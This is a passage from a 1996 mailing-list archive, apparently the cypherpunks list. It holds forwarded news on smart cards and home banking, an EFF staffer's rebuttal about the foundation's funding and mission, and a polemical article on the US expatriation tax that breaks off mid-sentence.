Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From dlv at bwalk.dm.com Tue Sep 17 18:20:11 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 09:20:11 +0800 Subject: [NEWS] Some crypto-relevant wire clippings for a change Message-ID: WITH INTUIT ACQUISITION, CHECKFREE WILL SERVICE ONE MILLION CheckFree Corporation announced an agreement to acquire Intuit Services Corporation (ISC) for 12.6 million shares of common stock in CheckFree Corporation. Intuit Services Corporation is a wholly owned subsidiary of Intuit Inc. Based on the September 13 closing price of 18 1/16 for CheckFree stock, the indicated price CheckFree is paying for ISC is $227 million. After completion of the acquisition, CheckFree will provide home banking and bill payme nt services to over 180 financial institutions. The acquisition will bring CheckFree's base of home banking and bill payment users to over one million. CheckFree Corporation markets its electronic commerce processing capabilities exclusively to financial institutions, which, in turn, use them to provide home banking and bill payment services to their customers. CheckFree's approach is behind the scenes: providing banking and bill payment transaction processing. -- PR Newswire, 9/16/96 French Bank Note Printer Buying U.S. Card Maker By VALERIE BLOCK Francois-Charles Oberthur Group of France, the third-largest bank note printer in the world, has agreed to purchase Kirk Plastic Co., the second- largest card manufacturer in the United States. The deal, announced last week, follows the sale of other North American plastic card producers to European companies over the last two years. Gemplus bought a U.S. manufacturing base from DataCard Corp., and competitor Schlumberger acquired Malco Plastics. Giesecke & Devrient of Germany bought Security Card Systems of Canada, and De La Rue of Great Britain bought McCorquodale. Los Angeles-based Kirk Plastic had announced a joint venture with Orga Card Systems Inc., a German smart card company, in July 1995, but those negotiations were terminated several months ago. Kirk R. Hyde, president of Kirk Plastic, a 77-year-old family-owned business, said Oberthur made a better partner. Mr. Hyde, 53, will sign a three-year employment contract with Oberthur, also a family business, which is 70%-owned by Jean-Pierre Savare. Kirk Plastic will keep its name and 2,500 employees. Mr. Hyde said he'd had reservations about selling his company, but "if we don't make the deal, we could be out of business in five years if smart cards take over." He said his competitors were purchased by large European concerns driven by smart cards and technological changes. "I could no longer keep up with investments to remain competitive," he added. The new owner will infuse capital and technology, and add distribution channels. Mr. Hyde would not disclose specific terms of the deal, which is scheduled to close within 30 days. Industry observers see the European invasion as concrete evidence that smart cards are gaining ground in the United States. "It's another indication that many companies are betting millions that the U.S. market will develop very quickly," said Dan Cunningham, senior vice president of business development at Phoenix Planning and Evaluation Ltd., a Rockville, Md.-based consulting firm. Mr. Cunningham headed Gemplus' U.S. subsidiary before it acquired the DataCard manufacturing facilities. In Atlanta, Visa is testing Visa Cash, the stored-value smart card system launched in conjunction with the Olympic Games. By early next year, Visa will join with MasterCard, Citibank, and Chase Manhattan Bank in a potentially crucial "interoperability" test on Manhattan's Upper West Side. In other signs of U.S. progress in the smart card industry: Wells Fargo and Co. and AT&T Universal Card Services became owners of Mondex International, the company formed by National Westminster Group of London; several universities are implementing smart card systems on campuses in conjunction with banks; and U S West rolled out card-reading phones in several western states. Even so, smart cards are not producing income here. Mr. Cunningham said acquisitions of profitable companies like Kirk can generate funding for early smart card development. Kirk Plastic, with annual revenues of more than $25 million, said it will produce 125 million magnetic stripe cards this year. Oberthur, an international producer of lottery tickets and plastic cards in addition to bank notes, participates in a joint venture, CP8 Oberthur, which is one-third owned by Bull Group of France, another top smart card producer with U.S. facilities. CP8 Oberthur produces 50 million smart cards annually in two French factories, supplying nearly 70% of French bank cards. Oberthur's U.S. subsidiary, Banknote Corporation of America, is the second-largest security printer in the United States. ComputerWorld: August 26, 1996 Opening Soon: Microsoft National Bank If Bill Gates can persuade the Justice Department to go easy on Microsoft's monopoly in PC operating systems, just imagine how easily he could persuade regulatory agencies to grant him a bank charter. Give up a few tons of documents, hold several meetings that consist of silly bureaucratic bantering and voila! he's got an $ 18 billion de novo bank with millions of online "branches" overnight. And not a trowel of mortar needed. Why speculate about the notion of a Microsoft bank? Because Gates is an impatient man. He doesn't believe bankers are moving fast enough to make home banking a success. The entrepreneurial instinct of such a highly successful person suggests that if conventional approaches don't work, he will bypass them and take over. Gates is a helluva marketer and promoter; he could sell the concept with pizzazz. There's also a bit more to this proposition than meets the eye. A recent phone call from Microsoft's lead person in the home-banking fray revealed some interesting insights. First, the only reason this well-informed and well-connected gentleman called me is that he knows how I feel about home banking it's a solution searching for a problem. I think he's trying to swing me (and at least one other highly visible skeptic) over to his camp. Second, the executive said, home banking has to be sold aggressively by banks. He figures consumers aren't likely to rush in and sign up. He's absolutely correct about the absence of a rush. The part about having to sell online banking aggressively to consumers worries me. If that's the case, then home banking is a cat that has already used up eight lives in the past 25 years. Every major bank has tried home banking and has failed. If the last chance depends on the typical banker's sales skills, then home banking is dead for sure. Consumers are smarter than ever. Give them good reasons to switch, and they don't have to be pushed. Home banking doesn't yet provide compelling reasons. Today's consumers are in love with the checkbook. They aren't complaining about checks. (Banks, of course, hate checks because they're expensive to process.) Consumers don't want to expose their spending habits on the Internet,either. They just aren't ready to say, "I think I'll jump on the Internet today and pay my bills." The promoters of home banking point to surveys that show the increasing penetration of PCs in U.S. households. But that doesn't mean those PCs will be used for online banking. If a poll said 80% of U.S. homeowners have a back yard, does it mean they all want to plant tomatoes? Even banking's technocrats don't do online banking when they go home. If compelling reasons to bank from home are missing, then the next best chance for success will depend on a cultural shift. Maybe the future yuppies, who are now in grade school, will embrace home banking just because it fits in to their electronic lifestyles. The "Gomwatms" grumpy old men with all the money will eventually fade out of the picture. Home banking is a sure thing, once we find its right decade. By M. Arthur Gillis; Gillis is president of Computer Based Solutions, Inc., a banking technology consultancy in Dallas. His Internet address is artgillis at aol.com Financial Times:Thursday, August 29, 1996 Online Shopping Plan Claims Better Security Uunet Pipex on the Internet not only met widespread concerns about security but was more secure than buying by phone or in a shop with a credit or debit card. The company, the UK subsidiary of MFS, the US telecoms operator bought earlier this week by WorldCom of the US and one of the largest European Internet service providers, believes its system is in advance of US developments. The British system is backed by National Westminster Bank, which will act as the clearing house for online debits and credit card transactions. Uunet Pipex said the system, called "The Bureau", will enable customers to buy goods from electronic "shops" on the Internet in safety and with security. Merchants trading on the Internet will be able to take advantage of an established payments mechanism without the cost of building their own. Shopping over the Internet has been possible for some time but its popularity has been held back by concerns over security. Potential customers are reluctant to trust the Net with their credit card information. Nevertheless, online electronic commerce is believed to be worth $300m ({GBP193m) annually at present and rising. Among the organisations seeking to develop secure shopping and payments systems are card companies Visa, Mastercard and American Express and software developers Microsoft, Netscape Communications and Verifone. Internet merchants sign up with Uunet Pipex and pay 5 per cent of the purchase value per transaction. The system is activated when a customer presses the "buy" key and enters his or her credit information. It is then stored securely by Uunet who instructs NatWest to pay the merchant for the purchase. When the deal is complete electronic confirmations are generated for customer and merchant. Mr Richard Nuttall, Uunet Pipex director of electronic commerce, said: "Until now, security concerns have deterred buyers and sellers from doing business over the Net. We have created a comparatively low cost system that is more secure than buying goods on an ordinary credit or debit card." Four merchants have already signed up to use the system. Responsibility for establishing an electronic shop on the Net remains with the merchant. Many believe the quality of the images of goods for sale is a more effective deterrent to Internet commerce than fears over payment security. The principle advantage of "The Bureau" over competitive systems seems to be the ease and low cost of adoption. Mr Susen Sarkar of the London technology consultancy, Ovum, said: "The launch of The Bureau will remove anxieties for both merchants and consumers." Other UK groups, notably Barclays Bank, already offer Internet shopping services and British Telecommunications is testing a large-scale online shopping service. American Banker: Thursday, August 29, 1996 On-Line Banks Unsure About What Kind of Web to Weave JENNIFER KINGSON BLOOM Most banks want to do more with their Web sites, but aren't exactly sure what, according to a survey of banks that have presences on the Internet. Netmarquee Online Services Inc., a Needham, Mass., company that offers on-line information for family businesses, conducted the survey this month. Of 150 banks in the survey, 65% wanted to enhance their content so that people would visit the Web sites more often. "A good number of these banks put Web sites up nine months or a year ago, and they're saying, 'Now what?'," said David Gumpert, president of Netmarquee. "They're coming to realize that they need to do something more than an electronic brochure, to provide some kind of value added to their prospects and customers besides just saying, 'Aren't we great?'" Mr. Gumpert's survey, conducted by telephone, found that traffic ranged from 100 to 500 visits a month. Only 5% of banks surveyed said they were actively promoting or advertising their Web sites. The survey also found that the larger the bank, the more interested it was in using the Internet for business purposes. Banks now are devising a variety of ways to draw repeat traffic to their sites, including trivia quizzes and mortgage calculators. Mr. Gumpert's company sells packages of information relevant to small businesses, and he is trying to coax banks to subscribe to his information service, which provides monthly updates. One bank that is considering a subscription to Netmarquee's product is Bank of Boston Corp. Ray Graber, marketing manager for the Web site, said the bank is looking at ways to provide interactive features, like on-line account applications or account transfer capabilities. Mr. Graber said the bank is also considering a service called "Rentnet" that lists apartment rentals on the Internet and might prove helpful to the many college students in the Boston area. Financial Post (Canada): Tuesday, August 27, 1996 Smart Cards Don't Have All the Answers-- Yet By MOTOKO RICH and GEORGE GRAHAM In Mission Impossible, Tom Cruise's latest film, the fearless Ethan Hunt breaks into the CIA computer room, disarming a technological stronghold by punching in numerical codes and submitting his eyes for a retina scan. While most viewers see such high-tech wizardry as fantastic, some of the gadgets may not be far from reality. Researchers worldwide are experimenting with technology that would allow not only security barriers but also electronic payment systems to use the retina, the handprint or even a facial expression as an identification method. "We are moving into the electronic age where money will just be information about the wealth you have," says Hans van der Velde, president of the European Union region of Visa International. Some companies believe that parts of the body, rather than paper or coins, can be used to establish the amount of money somebody has available to spend. For the time being, however, most participants in the payment industry believe the best alternative to cash remains the humble, but universal, plastic card. An increasing number of payment card organizations are replacing the magnetic strip -- the present industry standard -- with a tiny computer microchip that enables cards to be used not only to carry out financial transactions, but also to store data about the card's owner. A chip-based card is much more difficult to counterfeit than the magnetic stripe card and can carry details of a cardholder's insurance policies, medical history or driver's licence. It can be used to manage a retailer's loyalty program and even be used as a key for house or car. Above all, as a plethora of experiments demonstrates, it can be used as an "electronic wallet" storing value instead of petty cash. Pilot programs from the U.S. to Australia are testing the capabilities of these cards. In Britain, the most advanced trial is being conducted by Mondex, originally backed by National Westminster Bank and Midland Bank, and now owned by 17 banks. During the past year, Mondex has invited customers to use the cards in Swindon, where they can pay for small items like newspapers or chocolate bars without coins or notes. The cards are loaded up with value debited from the customer's bank account at automated teller machines or on "smart" telephones. Retailers can then take funds off the card without having to authorize each transaction online. While Mondex is in a race with other global payment organizations to develop and market its version of the electronic wallet on a global basis, several regional projects are harnessing the smart-card technology for a number of payment applications. Transcard, operated in western Sydney by Card Technologies Australia, combines an electronic bus pass with a re-loadable cash card that clocks up loyalty bonus points for buying McDonald's hamburgers or entry to the local swimming pool. In France, customers can pay for taxi rides, newspapers and phone calls with virtually ubiquitous smart cards. Sponsors of these projects are enthusiastic about the early results. "The technology works. That's probably more of a shock to people than anything else," says Beth Horowitz, MasterCard's vice-president for chip card business in Australia. Live testing has resolved some questions. Almost everyone now agrees that the electronic wallet must be reloadable, not a disposable fixed-value card that has been used for telephone cards or in Visa's Atlanta pilot. But for those who wish to exploit the global market -- worth an estimated US$ 4.3 trillion -- for card payments, there are some issues that remain unresolved. One is standards, an issue that plagues all new technological innovations, from the Internet to videocasette tapes. Although Europay, MasterCard and Visa, the largest global retail payments organizations, have developed international standards for chip cards, some systems -- notably Mondex -- do not comply. "The issue of standards has complicated the market for 15 years," says Gerald Hawkins, manager of card services at Lloyd's TSB in Britain. "It is one of the reasons why Mondex, while clearly a very advanced development, has taken a bit of a knock." The idea of a standard is that it would guarantee interoperability among systems, because retailers will want multiple terminals to accept different cards. Mondex argues that the market, rather than standards, will determine which cards will operate in point-of-sale terminals. It says that a number of these terminal suppliers have already demonstrated that interoperable equipment can be made to accept Mondex and all other magnetic stripe and chip cards. In fact, the EMV standards themselves have been criticized because they stick to "contact" technology, in which the chip must come into physical contact with a reader inside a slot. For high-volume applications in places such as railways or buses, contactless technology, in which a card contains a small radio transmitter or a stripe that can be read with a quick swipe, are considered more appropriate. "A contact smart card in a mass transit environment is just too slow," says John Hall, general manager for retail banking services for the Credit Union Services Corp. of Australia. The biggest problem of all, however, is ensuring the smart card makes financial sense. "The reason for all these projects is that no one has proven the business case. I'll be really interested to see if anyone makes money out of this," says Eugene Lockhart, president and chief executive of MasterCard International. The business case for the smart card has receded because telecommunications charges that once made online verification expensive are now coming down, and with them fraud rates. "Ten years ago you could justify the wallet on the basis that it would cut costs," says Peter Hirsch, managing director of consultants Retail Banking Research. "But now telecommunication costs are coming down and the business case is getting weaker. The chip is too expensive to give short-term returns." But at about US$ 14 apiece, a smart electronic wallet -- though more expensive than a magnetic stripe card -- is not completely devoid of financial advantages. Cash, which the wallet would partly displace, is expensive. The Association of Payment Clearing Services in London estimates that handling cash costs the British financial services industry about US$ 4.24 billion a year. For banks, the wallet could offer the chance to undo some of their past mistakes. In Australia, for example, the banks have pressed cards so far that they are being used for much lower value purchases than banks would like. "We don't think much of paying 20 cents to process a 95 cents transaction at McDonald's," says Hall of the Australian credit unions. For merchants, the replacement of cash means the elimination of considerable hassle. "If you take cash, you have to take it home, count it, put it into a night safe and then pay it into the bank the next day," says Richard Jackson, manager of Victoria News in Swindon, which accepts the Mondex card. But many retailers are likely to resist paying for the "privilege" of accepting the wallets. "Of course, there will be tough negotiations between individual banks and retailers," says Ron Clark, chief executive of Mondex in Britain. "We had this battle over Switch [the British debit card brand] with retailers who said they wanted us to provide it for free. But over time they have paid for it because it is a business proposition." Consumers, on the other hand, may prove much more difficult to convince that an electronic wallet is worth paying for when they can get cash for free. But Transcard charges US$ 7.82 a card, and says customers gladly pay it because the cost is covered within two weeks by the free bus rides they earn through a loyalty bonus scheme. "We have categorically proved that the consumer will pay," said David MacSmith, managing director of Card Technologies Australia. But it still may be difficult to persuade consumers to abandon cash altogether. "We are going to have a migration period of at least 10 years," said Lockhart of MasterCard. It will take even longer for more technologically advanced developments like the retina scan to move out of the film world into the marketplace. Richard Tyson-Davies, director-general of Apacs said: "The card is one of the most standardized items in the world. It is tremendously accepted and recognized so it would be a very bold person who threw that away." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mpd at netcom.com Tue Sep 17 18:30:44 1996 From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Sep 1996 09:30:44 +0800 Subject: Child pornography -- Expert witness for Federal jury trial Message-ID: <199609171941.MAA09023@netcom17.netcom.com> A Cyber-Liberties Advocate writes: > I just got a call from two Federal Public Defenders whose client is > charged with possession of child pornography stored in the /tmp > directory of a Unix system, in a zip'd file. (These lawyers seem to be > reasonably cyber-savvy, and told me they're following what I've been > writing about cyber-liberties.) Is this the Leachman/UPitt thing? --- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From mech at eff.org Tue Sep 17 18:31:57 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 18 Sep 1996 09:31:57 +0800 Subject: Why organizations turn statist. In-Reply-To: <199609150312.UAA02749@dns2.noc.best.net> Message-ID: <199609172104.OAA12280@eff.org> James A. Donald typed: > The EFF is ultimately a business lobby group, because it gets > most of its funding from businesses. Faulty logic. A does not follow from B. I have news for you: Most nonprofits get most of their funding from businesses. In some cases, corporations offer funding because the organization exists to represent their corporate donors (such things are variously called industry associations, trade groups, and in some cases PACs.) Others give to organizations that are centered on a written mission statement, rather than on the flexible interests of the donors, and the give because it 1) improves their market or customer base in various ways, and 2) allows them to claim philanthropy and charity, which are marketable traits. There's a very large difference between organizations that exist to represent the interests of members and donors, whatever those interests happen to be at the moment, and organizations with specific mission statements. It doesn't do well to confuse the two. It's the difference between the Business Software Alliance and the Free Software Foundation, between the Telephone Association of America and Voters' Telecom Watch. > It is therefore potentially > subject to the same corruption as other business lobbies. This is assumption not fact. The facts are that EFF accepts donations from companies that support our mission. If they expect to get some kind of trade association style "representation" for that, they are deluded. What they get is our work to help the Net grow and flourish, which is good for their business. That's the perq they get. Nothing else. If you don't believe this, I invite you to ask all of the RBOCs whether they give us money any more. They used to, but didn't listen and expected us to act like their PAC, particularly on Digital Telephony. Instead of fighting for RBOCs' "rights" we fought for YOURS. They don't fund us any more. We don't care. Our mission doesn't bend to attract funders. It's stayed the same since day one. You may think EFF didn't do a good job on DigTel, but we didn't do Bell Atlantic's dance, that's for sure. And why don't you ask our boardmember Tim O'Reilly whether EFF has asked him to stop combatting MicroSoft attempts to license how many IP connections people can make with NT Server, because it hurts our chances of getting money from Bill Gates. EFF has certainly be *pressured* to behave like a PAC, and this was one of our many reasons for leaving DC. It became increasingly difficult to fund a DC-based organization that was *not* a membership-controlled lobbying organization. We're betting on one thing: That the software, online commerce, and related industries, centered on Silicon Valley, can be dragged into the politics that are threatening to stomp them. It's been observed multiple times by several commentators that some key differences between this industry and older industries are 1) lack of philanthropy - almost no charitable organization support is seen from the computer industry at all, and 2) participation in the political process - there really hasn't been much action of any kind from the computer industry in legislative or legal issues in general, only on specific stuff like their particular intellectual property rights, even though some of the political issues cropping up on the Hill threaten their entire market. Most analysis concludes that these two lacking features are due to youth of the industry, and lack of anyone pushing them into action. So, we're pushing. If we fail, we won't be here in 1997. EFF does not want to be a PAC. We *can't* be a PAC. We don't have the necessary skill set (we have a membership coordinator, we have civil liberties attorneys, etc. We do not have professional lobbyists, nor do we have an on-staff media and PR communicator, as some examples.) We'd like to see the industry recognize that what we're doing is vital for them, and to support it, but also to get their own trade associations going and working and actually engaged in the political process (for one thing, that further reduces any desire to try to get EFF to play that role, which we will not do. Less wasted time and effort pushing us, and less of the same from us pushing back.) I hope this explains the situation fairly clearly. > To be a successful lobby group, the EFF needs to get its > fingerprints on legislation, so that it can make threats and > promises to businessmen in the computer industry. EFF isn't interested in being "a successful lobby group". That's CDT's job. You may have missed some of the history here: CDT's core staff is our former policy staff. They split off because they wanted to do lobbying work, and EFF didn't. > Our interests, and the EFF's interest are opposed with no > apparent mutual good possible. That's absurd. I suppose you think ITAR and the CDA are good things? If not, then our work to defeat them is mutual good. > In order to be well funded, the EFF needs government > regulation of the net. The kind of regulation that would be That's absurd, too. I suppose there's a hidden grain of logic there: EFF would have little or no reason to exist without some kind of bad action on the part of government when it comes to the Net. This is true. We all would be really happy if that weren't the case and there was no need for an EFF. The day the government stops censoring and EFF can go away will be the happiest day of my life if it ever happens. Hell, I could be making 3x my current salary in the commercial sector. If you think I do this because I enjoy working 12 hour days fighting the largest government on earth, for a paycheck that only barely covers the bills, you have another think coming. At any rate, there is no logical connection whatsoever between the grain of truth here, and your conclusion (that EFF must be working to *increase* government control to keep itself alive). There are many assumptions that one is required to make before arrival at that conclusion from the data, and some of these conclusions are not only contradictory, but precluded by other observable facts. [...] > most effective in ensuring large donations would be regulation > that compels internet businessmen to lobby the government. > for example regulations that make impossible, inconsistent, and > contradictory requirements on those who provide software, [...] In other words you are claiming EFF authored the Communications Decency Act? [...] > of business, for example legislation that requires case > by case approval of software, or legislation that compels > the businessman to invade his customers privacy, and also > prohibits him from invading that privacy unless he has a > waiver issued by the state. In other words, you are claiming EFF is not really behind the Bernstein v. US Dept. of State suit to get rid of the only existing US "legislation that requires case by case approval of software"? -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From tdell at netscape.com Tue Sep 17 18:33:13 1996 From: tdell at netscape.com (Thomas Dell) Date: Wed, 18 Sep 1996 09:33:13 +0800 Subject: Wealth Tax vs. Capital Gains Tax Reduction In-Reply-To: Message-ID: <323F13CA.7523@netscape.com> > Needless to say, I despise the idea of a "wealth tax," and I can > see various loopholes and workarounds. I'd also expect a lot of > folks to simply move out of the country if this were to happen. Not without difficulty. While this is not from a reliable source, it does seem that the gov't is aware of this issue. Tom tdell at netscape.com Subject: The Expat Tax Is Law - The Door Is Now Closed! Date: 16 Sep 1996 18:38:52 -0700 From: taxhaven at ix.netcom.com (Adam Starchild) Reply-To: privacy at ftc.gov The Expat Tax Is Law - The Door Is Now Closed! by Marc M. Harris After last year's failed attempt to pass an American expatriate tax, the U.S. Treasury Department succeeded in sneaking the provisions into the miscellaneous revenue positions of the recently passed Health Coverage Availability and Affordability Act of 1996. Given the failure of their high profile campaign last year, the Treasury Department switched strategies this year and undertook one of stealth. While the press was talking about tax-deductible contributions to medical savings accounts (MSAs), provisions tightening the expatriation tax rules were implemented. Foreign grantor trust rules were also tightened under the law. In order to provide the health insurance and care benefits provided under the law, a separate tax title adds certain revenue raising provisions. In general, these revenue offsets add provisions aimed at making certain the United States get their fair share plus some when U.S. citizens and permanent residents expatriate. In short, Uncle Sam would like to tell its expatriates that they earned their money from the United States, not in it. A review of selected sections of the Congressional Record provides some additional insight into the thinking behind these new provisions. "It has come to the attention of Congress that some very wealthy individuals have been relinquishing their citizenship to avoid U.S. income, estate and gift tax. The bill does not want to discourage citizens from exercising their right to expatriate, but does not want to provide a tax incentive for such an action..." If Congress truly wanted to eliminate the incentive for expatriation, it might be better to eliminate high taxation and put an end to the litigation crisis rather than creating another layer of government regulation and bureaucracy. "Congress believes the changes are consistent with existing tax treaties in conferring a tax credit for taxes paid in the foreign country, and to the extent they are inconsistent, the Treasury Department will re-negotiate the treaties to account for the changes. The new provisions take precedence over any treaties..." To make certain that other countries will not benefit from America's brain drain, the United States will once again embark on a campaign to bully other nations into accepting America's oppressive system of taxation and regulation. "This bill would subject former citizens to the expatriation provisions with no inquiry into their motive and requires individuals who exchange property that would otherwise be exempt from U.S. taxation as foreign source income must immediately recognize U.S. source income on any gain from such a transaction. The Secretary is authorized to issue regulations to treat removal of tangible property from the U.S. and other conversions to foreign source income. For example, any income from stock transferred to a foreign source, such as dividends, would be converted to U.S. source and immediately taxed..." Logic dictates that if this tax were to approach 100%, it would look quite similar to currency controls and foreign investment prohibitions. Since it only goes about half of the way, we can assume that we are 50% down the road toward American currency and foreign investment controls. "A new information reporting requirement has been added requiring former citizens and long-term residents to complete information reporting at the time of expatriation..." Just to make certain that no one escapes from the United States without leaving all their wealth behind, the new information reporting requirements will make certain that the Treasury Department always knows where your assets are placed. Of course, if you fail to report, civil and criminal sanctions will apply. The new treaty negotiations will most likely include provisions to extradite those "expat tax evaders" back home for their "criminal act" of leaving a country that was once known as the home of the free. Our sources at the Internal Revenue Service tell us this treaty provision will be known as the Hotel California provision -- you can check out, buy you can never leave. "The bill also requires that a U.S. person that receives a distribution from a trust must report that to the Service..." Now Uncle Sam is not only seeking to penalize those patriots that have placed their funds out of harm's way, but now the potential recipients of those receipts. If the logic of current money laundering statutes apply as they do in most tax cases, the bank that accepts the cashing of the beneficiary's distribution check from a foreign trust will be a co-conspirator in this "unpatriotic" affair. "Effective for transfers made after February 6, 1995, if a non-resident alien becomes a resident within five years of transferring property to a foreign trust, the transferor will be considered to have transferred the property on the date he became a resident..." The Statue of Liberty stands as America's great symbol of open immigration with its famous inscription "give us your tired and poor." With this provision, any person who hopes to emigrate to the United States will definitely become tired of complying with U.S. regulations and poor after he complies with them. "If a U.S. person receives more than $10,000 worth of gifts from one foreign person during any tax year, he must file a report with the Service. If he fails to file a report, the Service has the sole discretion to determine the taxation of the property received by the U.S. person and the person is liable for a penalty of 5 percent of the value of the gift for each month he fails to file a report..." Currency controls and foreign investment restrictions work both ways. Not only will governments prevent you from sending your money out, but they will also prevent you from sending your money in without their fair share plus some. "The Service has the power to prescribe regulations to prevent the avoidance of the Estate, Trust and Beneficiary part of the Code..." This provision is known as an Abusive Transaction provision. It is commonly referred to by international human rights organizations as the arbitrary and capricious application of laws. "Once the Secretary of the Treasury establishes a reasonable belief that the expatriate's loss of U.S. citizenship would result in a substantial reduction in estate, inheritance, legacy, and succession taxes, the burden of proving that one of the principal purposes of the loss of U.S. citizenship was not avoidance of U.S. income or estate tax is on the executor of the decedent's estate..." If these provisions were making you feel a bit suicidal, please forget it. Uncle Sam is not only going to pursue you to the grave, but also your executors and heirs. Other items in the Congressional Record provide an even greater insight into Washington's motivations: "Because U.S. citizens who retain their citizenship are subject to income tax on accrued appreciation when they dispose of their assets, as well as estate tax on the full value of assets that are held until death, the Committee believes it fair and equitable to tax expatriates on the appreciation in their assets when they relinquish their U.S. citizenship. The Committee believes that an exception from the expatriation tax should be provided for individuals whose income and net worth are relatively modest..." If you are poor, you may leave; however, if you were a productive American in the United States that no longer exists, you must stay and pay or leave behind the fruits of your productivity. America's Second Civil War has begun and it is known as Class Warfare. "Exceptions from the expatriation tax are provided for individuals. (An) exception applies to a U.S. citizen who relinquishes citizenship before reaching age 18-1/2, provided that the individual was a resident of the United States for no more than 5 taxable years before such relinquishment..." Since one cannot renounce their American citizenship prior to their 18th birthday, the children of an American resident overseas have only 6 months to renounce their citizenship and avoid the application of these laws. Ho many 18 year olds are capable of making this type of decision? "Under the provision, an individual is permitted to elect to defer payment of the expatriation tax with respect to the deemed sale of any property. Under this election, the expatriation tax with respect to a particular property, plus interest thereon, is due when the property is subsequently disposed of. In order to elect deferral of the expatriation tax, the individual is required to provide adequate security to ensure that the deferred expatriation tax and interest ultimately will be paid... In the event that the security provided with respect to a particular property subsequently becomes inadequate and the individual fails to correct such situation, the deferred expatriation tax and interest with respect to such property becomes due. As a further condition to making this election, the individual is required to consent to the waiver of any treaty rights that would preclude the collection of the expatriation tax." Only in Congress could one dream of a law that requires its former citizens to waive their rights in a foreign country in order to escape from the political, social, and economic tyranny of the United States. "Under the provision, special rules apply to trust interests held by the individual at the time of relinquishment of citizenship or termination of residency. In addition, an individual who holds (or who is treated as holding) a trust interest at the time of relinquishment of citizenship or termination of residency is required to disclose on his or her tax return the methodology used to determine his or her interest in the trust, and whether such individual knows (or has reason to know) that any other beneficiary of the trust uses a different method..." The latter provision is known as the "Stool Pigeon" clause - - you are required to turn your fellow beneficiaries over to the Internal Revenue Service. Similar laws existed in Nazi Germany that encouraged children to turn their parents and neighbors over to the authorities. "If the individual holds an interest in a trust that is not a qualified trust, a special rule applies for purposes of determining the amount of the expatriation tax due with respect to such trust interest. Such separate trust is treated as having sold its assets as of the date of relinquishment or citizenship or termination of residency and having distributed all proceeds to the individual, and the individual is treated as having recontributed such proceeds to the trust. The individual is subject to the expatriation tax with respect to any net income or gain arising from the deemed distribution from the trust. A beneficiary's interest in a non-qualified trust is the basis of all facts and circumstances. If the individual has an interest in a qualified trust, a different set of rules applies. In determining this amount, all contingent and discretionary interests are resolved in the individual's favor (i.e. the individual is allocated the maximum amount that he or she potentially could receive under the terms of the trust instrument)..." The United States is quite generous in calculating the tax based on the maximum possible distribution. In their arrogance, it appears that the law does not detail how to recover the excess tax if the maximum level is never reached. Alternatively, Congress never intended for former Americans to comply with this law. "If the individual does not agree to such a waiver of treaty rights, the tax with respect to distributions to the individual is imposed on the trust, the trustee is personally liable therefor, and any other beneficiary of the trust will have a right of contribution against such individual with respect to such tax." Based on the above, no foreign financial institution with offices or business in the United States would accept the trusteeship of an American's assets. "Under the provision, an individual is permitted to make an irrevocable election to continue to be taxed as a U.S. citizen with respect to all property that otherwise is covered by the expatriation tax. This election is an "all- or-nothing" election;..." Congress is quite generous with this provision in allowing expatriating Americans to continue being chased by tax collectors for the rest of their lives overseas. "Under the provision, an individual is treated as having relinquished U.S. citizenship on the date that the individual first makes known to a U.S. government or consular officer his or her intention to relinquish U.S. citizenship... A U.S. citizen who furnishes to the State Department a signed statement of voluntary relinquishment of U.S. nationality, confirming the performance of an expatriating act with the requisite intent to relinquish his or her citizenship is treated as having relinquished his or her citizenship on the date the statement is so furnished (regardless of when the expatriating act was performed), provided that the voluntary relinquishment is later confirmed by the issuance of a CLN (Certificate of Loss of Nationality). If neither of these circumstances exist, the individual is treated as having relinquished citizenship on the date a CLN is issued or a certificate of naturalization is cancelled. The date of relinquishment of citizenship determined under the provision applies for all tax purposes..." Based on this provision, almost any American who now wishes to undertake the expatriation route will be subject to the tax. In short, the door has closed for most Americans. "Under the provision, the exclusion from income does not apply to the value of any property received by gift or inheritance from an individual who was subject to the expatriation tax. Accordingly, a U.S. taxpayer who receives a gift or inheritance from such an individual is required to include the value of such gift or inheritance in gross income and is subject to U.S. income tax on such amount..." This implies that if an American expatriate sends funds back to support his aging parents, his parents will need to treat these gifts as taxable income. If the parents fail to report these amounts, they could also suffer civil and criminal penalties associated with tax evasion. "Under the provision, an individual who relinquishes citizenship or terminates residency is required to provide a statement which includes the individual's social security number, forwarding foreign address, new country of residence and citizenship and, in the case of individuals with a net worth of at least $500,000, a balance sheet..." Given the desire to obtain balance sheets from expatriating Americans, it is only a matter of time before the IRS requires the inclusion of personal balance sheets of individual taxpayers with their Form 1040s or at least those they suspect might wish to expatriate. "In the case of a former citizen, such statement is due not later than the date the individual's citizenship is treated as relinquished and is provided to the State Department..." In short, this means that you cannot obtain your certificate of loss of nationality without providing the information to the United States government. "Further, the provision requires the Secretary of the Treasury to publish in the Federal Register the names of all former U.S. citizens with respect to whom it receives the required statements or whose names it receives under the foregoing information-sharing provisions..." Now your friends and neighbors can know that you have expatriated. Although Congress respects the right of Americans to expatriate, it will publish your name in the federal register as if expatriation were a criminal act. "The provision directs the Treasury Department to undertake a study on the tax compliance of U.S. citizens and green-card holders residing outside the United States and to make recommendations regarding the improvement of such compliance. The findings of such study and such recommendations are required to be reported to the House Committee on Ways and Means and the Senate Committee on Finance within 90 days of the date of enactment..." Uncle Sam has awoken to the fact that most Americans living overseas are the most likely individuals to expatriate and as a result, they are gearing up to create a machine to attack them as well. The provision is effective for U.S. citizens whose date of relinquishment of citizenship (as determined under the provision occurred on or after February 6, 1995. U.S. citizens who committed an expatriating act with the requisite intent to relinquish their U.S. citizenship prior to February 6, 1995, but whose date of relinquishment of citizenship (as determined under the provision) does not occur until after such date, are subject to the expatriation tax..." This means that if you have not already relinquished your citizenship or have only done so recently, you are subject to the expat tax. The door has closed, but not completely. About the Author Marc M. Harris is a certified public accountant and president of The Harris Organization. He has already developed a strategy for legally avoiding the expat tax, which he 